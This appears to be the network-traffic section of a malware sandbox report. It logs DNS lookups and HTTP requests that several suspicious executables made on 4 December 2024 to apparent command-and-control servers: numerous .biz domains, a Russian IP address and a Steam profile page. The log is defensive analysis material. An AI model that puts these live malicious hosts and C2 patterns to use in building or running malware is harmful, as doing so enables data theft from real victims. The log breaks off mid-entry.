                            formy-spill.biz
                            IN A
                            104.21.96.55
                            formy-spill.biz
                            IN A
                            172.67.173.74
                          • flag-ru
                            GET
                            http://185.215.113.206/
                            a340910d71.exe
                            Remote address:
                            185.215.113.206:80
                            Request
                            GET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:24 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                          • flag-ru
                            POST
                            http://185.215.113.206/c4becf79229cb002.php
                            a340910d71.exe
                            Remote address:
                            185.215.113.206:80
                            Request
                            POST /c4becf79229cb002.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJD
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                          • flag-us
                            POST
                            https://formy-spill.biz/api
                            v_dolg.exe
                            Remote address:
                            104.21.96.55:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: formy-spill.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=0trfg5l481i67b40gts8cqmojc; expires=Sat, 29-Mar-2025 22:08:03 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AFxKuvcXW1Cz%2BGIOGpWvK6GGzWd546OQIf3tx0MI8XzJh4utvM4mzDR3BkJmJe%2B0wMbJ0xTe8IK1Y7ZHKW5Uw8ZL5Fuoxkdh9onOSC5yxwsVN6UbWa11INKJeYcQHi8fmrk%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec9026cfd40edec-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=49811&min_rtt=49031&rtt_var=11640&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=583&delivery_rate=77219&cwnd=253&unsent_bytes=0&cid=8586fcff01cf4165&ts=294&x=0"
                          • flag-us
                            DNS
                            covery-mover.biz
                            rhnew.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            covery-mover.biz
                            IN A
                            Response
                            covery-mover.biz
                            IN A
                            172.67.206.64
                            covery-mover.biz
                            IN A
                            104.21.58.186
                          • flag-us
                            DNS
                            home.fvtekx5vs.top
                            4305f3e650.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            home.fvtekx5vs.top
                            IN A
                            Response
                          • flag-us
                            DNS
                            home.fvtekx5vs.top
                            4305f3e650.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            home.fvtekx5vs.top
                            IN AAAA
                          • flag-us
                            DNS
                            print-vexer.biz
                            rhnew.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            print-vexer.biz
                            IN A
                            Response
                            print-vexer.biz
                            IN A
                            104.21.35.246
                            print-vexer.biz
                            IN A
                            172.67.181.192
                          • flag-it
                            DNS
                            4305f3e650.exe
                            Remote address:
                            34.17.28.197:80
                            Response
                            HTTP/1.1 200 OK
                            server: nginx/1.22.1
                            date: Wed, 04 Dec 2024 04:21:30 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1
                          • flag-us
                            DNS
                            impend-differ.biz
                            rhnew.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            impend-differ.biz
                            IN A
                            Response
                          • flag-gb
                            GET
                            https://steamcommunity.com/profiles/76561199724331900
                            v_dolg.exe
                            Remote address:
                            2.22.99.85:443
                            Request
                            GET /profiles/76561199724331900 HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Host: steamcommunity.com
                          • flag-us
                            DNS
                            atten-supporse.biz
                            6e7c5374e5.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            atten-supporse.biz
                            IN A
                          • flag-us
                            POST
                            https://marshal-zhukov.com/api
                            v_dolg.exe
                            Remote address:
                            104.21.82.174:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: marshal-zhukov.com
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Wed, 04 Dec 2024 04:21:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Frame-Options: SAMEORIGIN
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2FcDzeqPJRhu%2BnpqO35BcrW0c5KUfkjCtrbFMQmMFPUIZzvH2MM30eZpxiBRLTgRWHg2s9X1xSgUXxKpl%2F8Vt3ZsxYAPJFCHbJOAL1B77MiIN2OaRvzKc0SmhUH9ha0RWVnB4kw%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec9027b6ec263b0-LHR
                          • flag-us
                            POST
                            https://marshal-zhukov.com/api
                            v_dolg.exe
                            Remote address:
                            104.21.82.174:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Cookie: __cf_mw_byp=N0WElinNOFM5JgmGbVciZIRHiJQKwmsXnZxI_3hDBZg-1733286086-0.0.1.1-/api
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 48
                            Host: marshal-zhukov.com
                          • flag-us
                            DNS
                            se-blurry.biz
                            rhnew.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            se-blurry.biz
                            IN A
                            Response
                            se-blurry.biz
                            IN A
                            172.67.162.65
                            se-blurry.biz
                            IN A
                            104.21.81.153
                          • flag-us
                            POST
                            https://dare-curbys.biz/api
                            e19e6b7125.exe
                            Remote address:
                            104.21.43.156:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: dare-curbys.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=u97rv3ktliqp276dl1atjthknr; expires=Sat, 29-Mar-2025 22:08:08 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f267PN%2Fq6lHPE3jpWng7NP2sWaYId59Em%2Fwmy7VkDfXGQ31G3S%2Bzv%2B%2FfYA8zSmmdgvFqnniL8BqeZcS4V6Odnu%2BarnKQvTjHyGp4g0JN%2BcoNffmtuSiEFX%2FMrX1w%2FxdhBqg%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec90289ff89d1f9-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=48548&min_rtt=47070&rtt_var=12248&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=583&delivery_rate=75941&cwnd=253&unsent_bytes=0&cid=f9cdd3ccd29b635e&ts=335&x=0"
                          • flag-us
                            POST
                            https://atten-supporse.biz/api
                            6e7c5374e5.exe
                            Remote address:
                            104.21.16.9:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: atten-supporse.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=eum4lt0ratjvqn6pe8d0oe6j0k; expires=Sat, 29-Mar-2025 22:08:08 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCRccVCvpO3PXdV6Bo1p%2BKD3SNK9aZB7bibel7a9CSt9jZBifRVPT5GfGZkBmITRaz79F4lorEevxl0mgQp1I9ED%2FiH4jl7Gzk2TO4oilJX4FTFmjHg2z89y0d3yba9%2BS%2BZ0zcM%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec9028afb346400-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=49967&min_rtt=47120&rtt_var=15285&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=78244&cwnd=253&unsent_bytes=0&cid=3ff59ff39460b8b9&ts=331&x=0"
                          • flag-us
                            POST
                            https://print-vexer.biz/api
                            e19e6b7125.exe
                            Remote address:
                            104.21.35.246:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: print-vexer.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=pn9f6vif5udgsnt3l0bu8vrrnu; expires=Sat, 29-Mar-2025 22:08:08 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8jK5GEhMtNIbKAXzDUDj4w4wqnn1klSxQwa9j9Jsa4sZqg6OoxQuhQpmyq1Ag%2F0UlSvrmyq4jnjs5iQVpyGrwkaZzS1p%2FNj%2FH3RA16IlTiXkJ5Gpaz1rFY6J4XVwDinHuM%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec9028cab7e9424-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=50185&min_rtt=47302&rtt_var=12207&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=583&delivery_rate=79361&cwnd=253&unsent_bytes=0&cid=ddf6d6d8f446d7c2&ts=341&x=0"
                          • flag-us
                            POST
                            https://se-blurry.biz/api
                            6e7c5374e5.exe
                            Remote address:
                            172.67.162.65:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: se-blurry.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=ff31v75r2cba1k6ta7nish31jk; expires=Sat, 29-Mar-2025 22:08:08 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3w%2FVJo9g8%2FNhcvlA%2BUIDOeYp7Dzzvs1V9WDtkcFI9JdRQpA1xZKBln2dLkCmnC5Nx3ZWGflXTRSY7q6IFLapMcg42iJi3RoQlFsknsFhM7BwpPuHjruabeKpNdkxULU"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec9028d9f25cd7e-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=49742&min_rtt=47963&rtt_var=13102&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=581&delivery_rate=71692&cwnd=253&unsent_bytes=0&cid=fcf51f38743f56f7&ts=335&x=0"
                          • flag-gb
                            GET
                            https://steamcommunity.com/profiles/76561199724331900
                            e19e6b7125.exe
                            Remote address:
                            2.22.99.85:443
                            Request
                            GET /profiles/76561199724331900 HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Host: steamcommunity.com
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Content-Type: text/html; charset=UTF-8
                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                            Cache-Control: no-cache
                            Date: Wed, 04 Dec 2024 04:21:30 GMT
                            Content-Length: 35602
                            Connection: keep-alive
                            Set-Cookie: sessionid=e0987059584be5cb17527011; Path=/; Secure; SameSite=None
                            Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                          • flag-us
                            POST
                            https://zinc-sneark.biz/api
                            6e7c5374e5.exe
                            Remote address:
                            172.67.136.167:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: zinc-sneark.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=pvr963qef24ulojvhh96otiung; expires=Sat, 29-Mar-2025 22:08:09 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cnCCFMQS54wJK8rh7Z%2BHvMw%2FiUwHYAoLd6yNu7rTS75%2F4rpSfLpimvATJLk6Qa6OcL0ibCN6qkYoXfu0nBPYOn%2BipJ6S7AafX6B%2BvgQecWhucAu0BGBihNENLwG6OgREr5Y%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902904920ef17-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=50608&min_rtt=47493&rtt_var=12324&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=583&delivery_rate=79781&cwnd=253&unsent_bytes=0&cid=c23a4ea1cbdce8fd&ts=327&x=0"
                          • flag-us
                            POST
                            https://marshal-zhukov.com/api
                            e19e6b7125.exe
                            Remote address:
                            104.21.82.174:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: marshal-zhukov.com
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Wed, 04 Dec 2024 04:21:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Frame-Options: SAMEORIGIN
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ywIx%2Bl86i6%2F1IZ1WnJlj%2FQHSWyN1HvFQyAwbtDqsyCF7v09OeXcIUG8e8SA2p%2FhfBmoffUwUn65WvdwwwmIol4evAXcV87hhc8RYemUoj5IvAgaA6quurroFqGFGdigSuqJDz2E%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902927d5cef0d-LHR
                          • flag-us
                            POST
                            https://marshal-zhukov.com/api
                            e19e6b7125.exe
                            Remote address:
                            104.21.82.174:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Cookie: __cf_mw_byp=kHOa8YwMrEMWpNS_QLnyivNfuveGiXZnRYWKQouVXF4-1733286090-0.0.1.1-/api
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 53
                            Host: marshal-zhukov.com
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=n1lqj2e9epnnn464kovbemicjo; expires=Sat, 29-Mar-2025 22:08:09 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OOz02gIzWFFRJU1HwBj2u2oHHSbd425MBOVcdJz4SRyFPcIQalfFyLsWKcQzNhde8BGuJzD%2Bw8ZnQHZ4bi%2BW%2F5OTZo3MkaoiG6D4Itl%2ByoZLj%2Bi9OuF%2BaqPUmGjHbfygnUR8k04%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec90292edecef0d-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=49025&min_rtt=47159&rtt_var=4689&sent=15&recv=13&lost=0&retrans=0&sent_bytes=8137&recv_bytes=1060&delivery_rate=216699&cwnd=257&unsent_bytes=0&cid=9eefc716935b2330&ts=422&x=0"
                          • flag-us
                            POST
                            https://dwell-exclaim.biz/api
                            6e7c5374e5.exe
                            Remote address:
                            104.21.88.210:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: dwell-exclaim.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=k9vpebjt66cshalhpk7ksji67s; expires=Sat, 29-Mar-2025 22:08:09 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=llHeaU%2BJeKjoCzXgFgaZqD5%2Be5DP2y%2BTMPQBdBfiOJwRHewQ2033VOMlVFk2TVZm1aEL7H%2FxFkXjfDqeWFGfdk10yz%2FruOcl8Zq%2BizRfqt1ntWYnI%2BmypDQs2uul5EuHSVSuBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec90292e931cd6f-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=48232&min_rtt=47117&rtt_var=11893&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=585&delivery_rate=79091&cwnd=253&unsent_bytes=0&cid=b8bd0f42b7f6242b&ts=350&x=0"
                          • flag-us
                            DNS
                            home.fvtekx5vs.top
                            4305f3e650.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            home.fvtekx5vs.top
                            IN A
                            Response
                            home.fvtekx5vs.top
                            IN A
                            34.17.28.197
                          • flag-us
                            DNS
                            home.fvtekx5vs.top
                            4305f3e650.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            home.fvtekx5vs.top
                            IN AAAA
                            Response
                          • flag-it
                            GET
                            http://home.fvtekx5vs.top/vxXfqWNjhpDBdpAIgFUP1733139437?argument=0
                            4305f3e650.exe
                            Remote address:
                            34.17.28.197:80
                            Request
                            GET /vxXfqWNjhpDBdpAIgFUP1733139437?argument=0 HTTP/1.1
                            Host: home.fvtekx5vs.top
                            Accept: */*
                            Response
                            HTTP/1.1 404 NOT FOUND
                            server: nginx/1.22.1
                            date: Wed, 04 Dec 2024 04:21:30 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 207
                          • flag-us
                            DNS
                            home.fvtekx5vs.top
                            4305f3e650.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            home.fvtekx5vs.top
                            IN A
                            Response
                          • flag-us
                            DNS
                            home.fvtekx5vs.top
                            4305f3e650.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            home.fvtekx5vs.top
                            IN AAAA
                            Response
                            home.fvtekx5vs.top
                            IN A
                            34.17.28.197
                          • flag-us
                            POST
                            https://formy-spill.biz/api
                            6e7c5374e5.exe
                            Remote address:
                            104.21.96.55:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: formy-spill.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=bcdjoo45n64t1so11r8jgq38fc; expires=Sat, 29-Mar-2025 22:08:10 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EseydPRct9HJY6l8IKLHLIpHG3fuNqKWhhsAipiJBBG%2B83PY5e0yVB9jtKLFj%2BNKt%2BfvN0bYTm64dIA4POx8gPPBR9HvXcYCzvh4%2F6VJ5sm4ZDAJz7r9EJXgU58U6z4m23s%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec90295eed894e7-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=49134&min_rtt=47252&rtt_var=12923&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=583&delivery_rate=74656&cwnd=253&unsent_bytes=0&cid=19fe2a3e2f81aa2e&ts=363&x=0"
                          • flag-it
                            POST
                            http://home.fvtekx5vs.top/vxXfqWNjhpDBdpAIgFUP1733139437
                            4305f3e650.exe
                            Remote address:
                            34.17.28.197:80
                            Request
                            POST /vxXfqWNjhpDBdpAIgFUP1733139437 HTTP/1.1
                            Host: home.fvtekx5vs.top
                            Accept: */*
                            Content-Type: application/json
                            Content-Length: 31
                            Response
                            HTTP/1.1 404 NOT FOUND
                            server: nginx/1.22.1
                            date: Wed, 04 Dec 2024 04:21:31 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 207
                          • flag-us
                            POST
                            https://covery-mover.biz/api
                            6e7c5374e5.exe
                            Remote address:
                            172.67.206.64:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: covery-mover.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=vgfnr1bv5f660fdaokeh2aegb8; expires=Sat, 29-Mar-2025 22:08:10 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FdSGqGDsgKBikJD%2BWI09fMNgUZoOdPJcEOUby%2FBuLgOuWiQ24XRjsotB6XQDuLuC6r66EtrImlYEEY99SkUIwXbh15AUuu41%2B%2FpUV4MkaNsI3nUO9%2B%2BtXS9Hj1exe7%2FUPOO8"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec90298eb50bf02-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=48936&min_rtt=46990&rtt_var=13293&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2858&recv_bytes=584&delivery_rate=75719&cwnd=253&unsent_bytes=0&cid=1958f394e35e8cdd&ts=321&x=0"
                          • flag-ru
                            GET
                            http://185.215.113.206/
                            bb34fd4a66.exe
                            Remote address:
                            185.215.113.206:80
                            Request
                            GET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:31 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                          • flag-ru
                            POST
